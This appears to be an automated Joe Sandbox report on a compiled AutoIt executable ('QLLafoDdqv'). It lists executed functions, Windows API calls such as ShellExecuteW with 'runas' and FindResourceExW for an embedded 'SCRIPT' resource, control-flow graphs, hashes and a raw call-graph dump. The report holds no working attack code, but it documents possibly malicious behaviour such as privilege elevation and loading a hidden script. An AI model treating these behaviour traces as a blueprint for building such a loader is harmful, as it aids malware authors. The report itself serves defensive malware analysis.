API calls 3 library calls 97280->97324 97281 712d90 97283 6d2f83 97283->97257 97284 6d2f8d 97283->97284 97325 6f4a28 40 API calls 3 library calls 97284->97325 97286 6d2f98 97287 6d2fdc 97286->97287 97326 6d3084 22 API calls 97286->97326 97287->97272 97288 6d2fe8 97287->97288 97288->97281 97328 6d63eb 22 API calls 97288->97328 97290 6d2fbf 97292 6da8c7 22 API calls 97290->97292 97294 6d2fcd 97292->97294 97293 6d2ff8 97329 6d6a50 22 API calls 97293->97329 97327 6d3084 22 API calls 97294->97327 97297 6d3006 97330 6d70b0 23 API calls 97297->97330 97299 6d3021 97302 6d3065 97299->97302 97331 6d6f88 22 API calls 97299->97331 97332 6d70b0 23 API calls 97299->97332 97333 6d3084 22 API calls 97299->97333 97305 6d4af0 __wsopen_s 97304->97305 97306 6d6b57 22 API calls 97305->97306 97307 6d4b22 97305->97307 97306->97307 97308 6d4c6d 22 API calls 97307->97308 97316 6d4b58 97307->97316 97308->97307 97309 6d9cb3 22 API calls 97311 6d4c52 97309->97311 97310 6d9cb3 22 API calls 97310->97316 97312 6d515f 22 API calls 97311->97312 97315 6d4c5e 97312->97315 97313 6d4c6d 22 API calls 97313->97316 97314 6d515f 22 API calls 97314->97316 97315->97229 97316->97310 97316->97313 97316->97314 97317 6d4c29 97316->97317 97317->97309 97317->97315 97318->97246 97319->97251 97320->97261 97321->97269 97322->97273 97323->97278 97324->97283 97325->97286 97326->97290 97327->97287 97328->97293 97329->97297 97330->97299 97331->97299 97332->97299 97333->97299 97334->97253 97335->97257 97336->97263 97337->97272 97338->97281 97339 6d3156 97342 6d3170 97339->97342 97343 6d3187 97342->97343 97344 6d318c 97343->97344 97345 6d31eb 97343->97345 97381 6d31e9 97343->97381 97346 6d3199 97344->97346 97347 6d3265 PostQuitMessage 97344->97347 97349 712dfb 97345->97349 97350 6d31f1 97345->97350 97352 6d31a4 97346->97352 97353 712e7c 97346->97353 97384 6d316a 97347->97384 97348 6d31d0 DefWindowProcW 97348->97384 97391 6d18e2 10 API calls 97349->97391 97354 6d321d SetTimer RegisterWindowMessageW 97350->97354 97355 6d31f8 97350->97355 97357 6d31ae 97352->97357 97358 712e68 97352->97358 97396 73bf30 34 API calls ___scrt_fastfail 97353->97396 97359 6d3246 CreatePopupMenu 97354->97359 97354->97384 97361 6d3201 KillTimer 97355->97361 97362 712d9c 97355->97362 97356 712e1c 97392 6ee499 42 API calls 97356->97392 97366 6d31b9 97357->97366 97376 712e4d 97357->97376 97395 73c161 27 API calls ___scrt_fastfail 97358->97395 97359->97384 97387 6d30f2 Shell_NotifyIconW ___scrt_fastfail 97361->97387 97367 712da1 97362->97367 97368 712dd7 MoveWindow 97362->97368 97371 6d31c4 97366->97371 97372 6d3253 97366->97372 97374 712da7 97367->97374 97375 712dc6 SetFocus 97367->97375 97368->97384 97369 6d3214 97388 6d3c50 DeleteObject DestroyWindow 97369->97388 97370 6d3263 97370->97384 97371->97348 97393 6d30f2 Shell_NotifyIconW ___scrt_fastfail 97371->97393 97389 6d326f 44 API calls ___scrt_fastfail 97372->97389 97373 712e8e 97373->97348 97373->97384 97374->97371 97380 712db0 97374->97380 97375->97384 97376->97348 97394 730ad7 22 API calls 97376->97394 97390 6d18e2 10 API calls 97380->97390 97381->97348 97385 712e41 97386 6d3837 49 API calls 97385->97386 97386->97381 97387->97369 97388->97384 97389->97370 97390->97384 97391->97356 97392->97371 97393->97385 97394->97381 97395->97370 97396->97373 97397 6dfe73 97398 6eceb1 23 API calls 97397->97398 97399 6dfe89 97398->97399 97404 6ecf92 97399->97404 97401 6dfeb3 97416 74359c 82 API calls __wsopen_s 97401->97416 97403 724ab8 97405 6d6270 22 API calls 97404->97405 97406 6ecfc9 97405->97406 97407 6ecffa 97406->97407 97408 6d9cb3 22 API calls 97406->97408 97407->97401 97409 72d166 97408->97409 97410 6d6350 22 API calls 97409->97410 97411 72d171 97410->97411 97417 6ed2f0 40 API calls 97411->97417 97413 72d184 97415 72d188 97413->97415 97418 6daceb 23 API calls ISource 97413->97418 97415->97415 97416->97403 97417->97413 97418->97415 97419 6d1033 97424 6d4c91 97419->97424 97423 6d1042 97425 6da961 22 API calls 97424->97425 97426 6d4cff 97425->97426 97432 6d3af0 97426->97432 97428 6d4d9c 97430 6d1038 97428->97430 97435 6d51f7 22 API calls __fread_nolock 97428->97435 97431 6f00a3 29 API calls __onexit 97430->97431 97431->97423 97436 6d3b1c 97432->97436 97435->97428 97437 6d3b0f 97436->97437 97438 6d3b29 97436->97438 97437->97428 97438->97437 97439 6d3b30 RegOpenKeyExW 97438->97439 97439->97437 97440 6d3b4a RegQueryValueExW 97439->97440 97441 6d3b6b 97440->97441 97442 6d3b80 RegCloseKey 97440->97442 97441->97442 97442->97437

              Executed Functions

              Function 006D42DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235libraryloaderCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 237 6d42de-6d434d call 6da961 GetVersionExW call 6d6b57 242 713617-71362a 237->242 243 6d4353 237->243 245 71362b-71362f 242->245 244 6d4355-6d4357 243->244 246 6d435d-6d43bc call 6d93b2 call 6d37a0 244->246 247 713656 244->247 248 713631 245->248 249 713632-71363e 245->249 266 7137df-7137e6 246->266 267 6d43c2-6d43c4 246->267 253 71365d-713660 247->253 248->249 249->245 251 713640-713642 249->251 251->244 252 713648-71364f 251->252 252->242 255 713651 252->255 256 6d441b-6d4435 GetCurrentProcess IsWow64Process 253->256 257 713666-7136a8 253->257 255->247 259 6d4494-6d449a 256->259 260 6d4437 256->260 257->256 261 7136ae-7136b1 257->261 263 6d443d-6d4449 259->263 260->263 264 7136b3-7136bd 261->264 265 7136db-7136e5 261->265 268 6d444f-6d445e LoadLibraryA 263->268 269 713824-713828 GetSystemInfo 263->269 270 7136ca-7136d6 264->270 271 7136bf-7136c5 264->271 273 7136e7-7136f3 265->273 274 7136f8-713702 265->274 275 713806-713809 266->275 276 7137e8 266->276 267->253 272 6d43ca-6d43dd 267->272 279 6d449c-6d44a6 GetSystemInfo 268->279 280 6d4460-6d446e GetProcAddress 268->280 270->256 271->256 281 713726-71372f 272->281 282 6d43e3-6d43e5 272->282 273->256 284 713715-713721 274->284 285 713704-713710 274->285 277 7137f4-7137fc 275->277 278 71380b-71381a 275->278 283 7137ee 276->283 277->275 278->283 288 71381c-713822 278->288 290 6d4476-6d4478 279->290 280->279 289 6d4470-6d4474 GetNativeSystemInfo 280->289 286 713731-713737 281->286 287 71373c-713748 281->287 291 6d43eb-6d43ee 282->291 292 71374d-713762 282->292 283->277 284->256 285->256 286->256 287->256 288->277 289->290 295 6d447a-6d447b FreeLibrary 290->295 296 6d4481-6d4493 290->296 297 713791-713794 291->297 298 6d43f4-6d440f 291->298 293 713764-71376a 292->293 294 71376f-71377b 292->294 293->256 294->256 295->296 297->256 299 71379a-7137c1 297->299 300 713780-71378c 298->300 301 6d4415 298->301 302 7137c3-7137c9 299->302 303 7137ce-7137da 299->303 300->256 301->256 302->256 303->256
              APIs
              • GetVersionExW.KERNEL32(?), ref: 006D430D
                • Part of subcall function 006D6B57: _wcslen.LIBCMT ref: 006D6B6A
              • GetCurrentProcess.KERNEL32(?,0076CB64,00000000,?,?), ref: 006D4422
              • IsWow64Process.KERNEL32(00000000,?,?), ref: 006D4429
              • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 006D4454
              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 006D4466
              • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 006D4474
              • FreeLibrary.KERNEL32(00000000,?,?), ref: 006D447B
              • GetSystemInfo.KERNEL32(?,?,?), ref: 006D44A0
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
              • String ID: GetNativeSystemInfo$kernel32.dll$|O
              • API String ID: 3290436268-3101561225
              • Opcode ID: 5e58d419d6dfeb18fa973428e244d21e4e5ef5a0b52b42e5afb7f7e9ab991676
              • Instruction ID: 569a3738feeeae290c9a7606aa7d775ee12e45a2e80a7a97d16c6f5d36e87631
              • Opcode Fuzzy Hash: 5e58d419d6dfeb18fa973428e244d21e4e5ef5a0b52b42e5afb7f7e9ab991676
              • Instruction Fuzzy Hash: 1AA1A465D0A2C0DFEF12CF6D78801E57FE5ABA7340F88C89AD08197B61D67C4949CB29
              Function 006D42A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1824 6d42a2-6d42ba CreateStreamOnHGlobal 1825 6d42bc-6d42d3 FindResourceExW 1824->1825 1826 6d42da-6d42dd 1824->1826 1827 6d42d9 1825->1827 1828 7135ba-7135c9 LoadResource 1825->1828 1827->1826 1828->1827 1829 7135cf-7135dd SizeofResource 1828->1829 1829->1827 1830 7135e3-7135ee LockResource 1829->1830 1830->1827 1831 7135f4-713612 1830->1831 1831->1827
              APIs
              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,006D50AA,?,?,00000000,00000000), ref: 006D42B2
              • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,006D50AA,?,?,00000000,00000000), ref: 006D42C9
              • LoadResource.KERNEL32(?,00000000,?,?,006D50AA,?,?,00000000,00000000,?,?,?,?,?,?,006D4F20), ref: 007135BE
              • SizeofResource.KERNEL32(?,00000000,?,?,006D50AA,?,?,00000000,00000000,?,?,?,?,?,?,006D4F20), ref: 007135D3
              • LockResource.KERNEL32(006D50AA,?,?,006D50AA,?,?,00000000,00000000,?,?,?,?,?,?,006D4F20,?), ref: 007135E6
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
              • String ID: SCRIPT
              • API String ID: 3051347437-3967369404
              • Opcode ID: 246a075dd664262b1961dfb6f7a89e26ad9afcf8139f8b6a19e43dc05d42bf46
              • Instruction ID: 8f7659fde18478b6f866f0df50208c0ada4bf0b7bd2b3275a48622568657523e
              • Opcode Fuzzy Hash: 246a075dd664262b1961dfb6f7a89e26ad9afcf8139f8b6a19e43dc05d42bf46
              • Instruction Fuzzy Hash: BB117C70600701BFE7228B65DC49F677BBAEFC5B51F10816AF847D6290DBB1DD008660
              Function 00712BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
              Download Yara Rule

              Control-flow Graph

              APIs
              • SetCurrentDirectoryW.KERNEL32(?), ref: 006D2B6B
                • Part of subcall function 006D3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,007A1418,?,006D2E7F,?,?,?,00000000), ref: 006D3A78
                • Part of subcall function 006D9CB3: _wcslen.LIBCMT ref: 006D9CBD
              • GetForegroundWindow.USER32(runas,?,?,?,?,?,00792224), ref: 00712C10
              • ShellExecuteW.SHELL32(00000000,?,?,00792224), ref: 00712C17
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
              • String ID: runas
              • API String ID: 448630720-4000483414
              • Opcode ID: 0ae78c4a52aae88b647397d5948f97223b6ab1779edddb5b18a84e4de8879300
              • Instruction ID: d643540db0769af3fb9bac1b6c5997cb7f89ac590afa182eb39c11fd9de8d72d
              • Opcode Fuzzy Hash: 0ae78c4a52aae88b647397d5948f97223b6ab1779edddb5b18a84e4de8879300
              • Instruction Fuzzy Hash: 28112C31E083915AD755FF64D8519BE7BA69FE5744F44442FF082023A3CF68894AC71B
              Function 0073DBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
              Download Yara Rule
              APIs
              • lstrlenW.KERNEL32(?,00715222), ref: 0073DBCE
              • GetFileAttributesW.KERNELBASE(?), ref: 0073DBDD
              • FindFirstFileW.KERNELBASE(?,?), ref: 0073DBEE
              • FindClose.KERNEL32(00000000), ref: 0073DBFA
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: FileFind$AttributesCloseFirstlstrlen
              • String ID:
              • API String ID: 2695905019-0
              • Opcode ID: 72eac06d1bf322ed8667c13715d8a6a76d7f68eff1fb54395183526af14965d0
              • Instruction ID: 643c8daf687ae83e39368bfd93b56a5a334912e88e81bdc431b8eb0b8de2b057
              • Opcode Fuzzy Hash: 72eac06d1bf322ed8667c13715d8a6a76d7f68eff1fb54395183526af14965d0
              • Instruction Fuzzy Hash: BFF0A7704206145FA2316B78AC0D47A776CAE01334F108702F876C10E1EBF89D5485AA
              Function 006DBF40 Relevance: 2.4, Strings: 1, Instructions: 1178COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: BuffCharUpper
              • String ID: p#z
              • API String ID: 3964851224-2781437441
              • Opcode ID: 5b24d06816cc9a8575612682a5decfa7c6b3d09c46638de714a013fa82d865f2
              • Instruction ID: 8bf7a7f724639f46705f99f24b0665224643b1b2148bf040f0109dbad4b50b56
              • Opcode Fuzzy Hash: 5b24d06816cc9a8575612682a5decfa7c6b3d09c46638de714a013fa82d865f2
              • Instruction Fuzzy Hash: 0FA27D70A08355DFD710CF18C480B6ABBE2BF89314F14896EE89A9B352D775EC45CB92
              Function 006DD730 Relevance: 21.6, APIs: 14, Instructions: 627sleeptimeCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: InputSleepStateTimetime
              • String ID:
              • API String ID: 4149333218-0
              • Opcode ID: 6b5ee86505a2915c55a1435c95bac68bb8339daaf7b59038d5ac592e4d4312cf
              • Instruction ID: 5a069a0b059f65590e8d978a29e9aa72318cd83de11aca0ebc9c769064dfa5ce
              • Opcode Fuzzy Hash: 6b5ee86505a2915c55a1435c95bac68bb8339daaf7b59038d5ac592e4d4312cf
              • Instruction Fuzzy Hash: EB423670A04341EFD725EF24C844BAAB7E2BF86304F14851EF8568B392D779E845CB92
              Function 006D2CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
              Download Yara Rule

              Control-flow Graph

              APIs
              • GetSysColorBrush.USER32(0000000F), ref: 006D2D07
              • RegisterClassExW.USER32(00000030), ref: 006D2D31
              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006D2D42
              • InitCommonControlsEx.COMCTL32(?), ref: 006D2D5F
              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006D2D6F
              • LoadIconW.USER32(000000A9), ref: 006D2D85
              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 006D2D94
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
              • API String ID: 2914291525-1005189915
              • Opcode ID: abf4921485fad8f7decfba4dde7d85d2729b00000cda5d9487c7e036090d72f4
              • Instruction ID: d41e656721f8152c92dd79ceb61baa6bd4ecab2fdab06af11c530d46052495e0
              • Opcode Fuzzy Hash: abf4921485fad8f7decfba4dde7d85d2729b00000cda5d9487c7e036090d72f4
              • Instruction Fuzzy Hash: 712127B0901358AFEB01DFA4EC48BEEBBB4FB48700F00811AF552A62A0D7B91544CF99
              Function 00708D45 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 300COMMONLIBRARYCODE
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 305 708d45-708d55 306 708d57-708d6a call 6ff2c6 call 6ff2d9 305->306 307 708d6f-708d71 305->307 321 7090f1 306->321 308 708d77-708d7d 307->308 309 7090d9-7090e6 call 6ff2c6 call 6ff2d9 307->309 308->309 312 708d83-708dae 308->312 326 7090ec call 7027ec 309->326 312->309 316 708db4-708dbd 312->316 319 708dd7-708dd9 316->319 320 708dbf-708dd2 call 6ff2c6 call 6ff2d9 316->320 324 7090d5-7090d7 319->324 325 708ddf-708de3 319->325 320->326 327 7090f4-7090f9 321->327 324->327 325->324 329 708de9-708ded 325->329 326->321 329->320 332 708def-708e06 329->332 334 708e23-708e2c 332->334 335 708e08-708e0b 332->335 338 708e4a-708e54 334->338 339 708e2e-708e45 call 6ff2c6 call 6ff2d9 call 7027ec 334->339 336 708e15-708e1e 335->336 337 708e0d-708e13 335->337 340 708ebf-708ed9 336->340 337->336 337->339 342 708e56-708e58 338->342 343 708e5b-708e79 call 703820 call 7029c8 * 2 338->343 370 70900c 339->370 345 708fad-708fb6 call 70f89b 340->345 346 708edf-708eef 340->346 342->343 374 708e96-708ebc call 709424 343->374 375 708e7b-708e91 call 6ff2d9 call 6ff2c6 343->375 358 708fb8-708fca 345->358 359 709029 345->359 346->345 350 708ef5-708ef7 346->350 350->345 354 708efd-708f23 350->354 354->345 360 708f29-708f3c 354->360 358->359 365 708fcc-708fdb GetConsoleMode 358->365 363 70902d-709045 ReadFile 359->363 360->345 361 708f3e-708f40 360->361 361->345 366 708f42-708f6d 361->366 368 7090a1-7090ac GetLastError 363->368 369 709047-70904d 363->369 365->359 371 708fdd-708fe1 365->371 366->345 373 708f6f-708f82 366->373 376 7090c5-7090c8 368->376 377 7090ae-7090c0 call 6ff2d9 call 6ff2c6 368->377 369->368 378 70904f 369->378 372 70900f-709019 call 7029c8 370->372 371->363 379 708fe3-708ffd ReadConsoleW 371->379 372->327 373->345 381 708f84-708f86 373->381 374->340 375->370 388 709005-70900b call 6ff2a3 376->388 389 7090ce-7090d0 376->389 377->370 385 709052-709064 378->385 386 70901e-709027 379->386 387 708fff GetLastError 379->387 381->345 391 708f88-708fa8 381->391 385->372 395 709066-70906a 385->395 386->385 387->388 388->370 389->372 391->345 399 709083-70908e 395->399 400 70906c-70907c call 708a61 395->400 402 709090 call 708bb1 399->402 403 70909a-70909f call 7088a1 399->403 412 70907f-709081 400->412 410 709095-709098 402->410 403->410 410->412 412->372
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID:
              • String ID: .o
              • API String ID: 0-1957372423
              • Opcode ID: a2d2d4247ac27b2bcf4d84df3ef3fe38d0109192b34bf9c5af5081b4b5290163
              • Instruction ID: 828c8c3f5b6c32db5ec654f076e1baca557b93afdc6cd4675d5c4b882d78edf1
              • Opcode Fuzzy Hash: a2d2d4247ac27b2bcf4d84df3ef3fe38d0109192b34bf9c5af5081b4b5290163
              • Instruction Fuzzy Hash: E3C1F174A0424AEFDB51DFA8C844BADBBF1AF49310F044299F654AB3D3C7389941CB61
              Function 0071065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 413 71065b-71068b call 71042f 416 7106a6-7106b2 call 705221 413->416 417 71068d-710698 call 6ff2c6 413->417 423 7106b4-7106c9 call 6ff2c6 call 6ff2d9 416->423 424 7106cb-710714 call 71039a 416->424 422 71069a-7106a1 call 6ff2d9 417->422 433 71097d-710983 422->433 423->422 431 710781-71078a GetFileType 424->431 432 710716-71071f 424->432 437 7107d3-7107d6 431->437 438 71078c-7107bd GetLastError call 6ff2a3 CloseHandle 431->438 435 710721-710725 432->435 436 710756-71077c GetLastError call 6ff2a3 432->436 435->436 442 710727-710754 call 71039a 435->442 436->422 440 7107d8-7107dd 437->440 441 7107df-7107e5 437->441 438->422 452 7107c3-7107ce call 6ff2d9 438->452 445 7107e9-710837 call 70516a 440->445 441->445 446 7107e7 441->446 442->431 442->436 456 710847-71086b call 71014d 445->456 457 710839-710845 call 7105ab 445->457 446->445 452->422 463 71086d 456->463 464 71087e-7108c1 456->464 457->456 462 71086f-710879 call 7086ae 457->462 462->433 463->462 466 7108c3-7108c7 464->466 467 7108e2-7108f0 464->467 466->467 469 7108c9-7108dd 466->469 470 7108f6-7108fa 467->470 471 71097b 467->471 469->467 470->471 472 7108fc-71092f CloseHandle call 71039a 470->472 471->433 475 710931-71095d GetLastError call 6ff2a3 call 705333 472->475 476 710963-710977 472->476 475->476 476->471
              APIs
                • Part of subcall function 0071039A: CreateFileW.KERNELBASE(00000000,00000000,?,00710704,?,?,00000000,?,00710704,00000000,0000000C), ref: 007103B7
              • GetLastError.KERNEL32 ref: 0071076F
              • __dosmaperr.LIBCMT ref: 00710776
              • GetFileType.KERNELBASE(00000000), ref: 00710782
              • GetLastError.KERNEL32 ref: 0071078C
              • __dosmaperr.LIBCMT ref: 00710795
              • CloseHandle.KERNEL32(00000000), ref: 007107B5
              • CloseHandle.KERNEL32(?), ref: 007108FF
              • GetLastError.KERNEL32 ref: 00710931
              • __dosmaperr.LIBCMT ref: 00710938
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
              • String ID: H
              • API String ID: 4237864984-2852464175
              • Opcode ID: 3d7b2947b5edf9c0b645642d35edd098d24897b8e53abf504cab54786642d6e1
              • Instruction ID: de18356d564fffede57596023328c43ca7459cb933514b6fe10b67b89811eae9
              • Opcode Fuzzy Hash: 3d7b2947b5edf9c0b645642d35edd098d24897b8e53abf504cab54786642d6e1
              • Instruction Fuzzy Hash: 17A14332A001088FDF19AF6CD895BEE3BA1AF46320F14415DF811AB3D1C7799992CBD5
              Function 006D344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
              Download Yara Rule

              Control-flow Graph

              APIs
                • Part of subcall function 006D3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,007A1418,?,006D2E7F,?,?,?,00000000), ref: 006D3A78
                • Part of subcall function 006D3357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 006D3379
              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 006D356A
              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0071318D
              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 007131CE
              • RegCloseKey.ADVAPI32(?), ref: 00713210
              • _wcslen.LIBCMT ref: 00713277
              • _wcslen.LIBCMT ref: 00713286
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
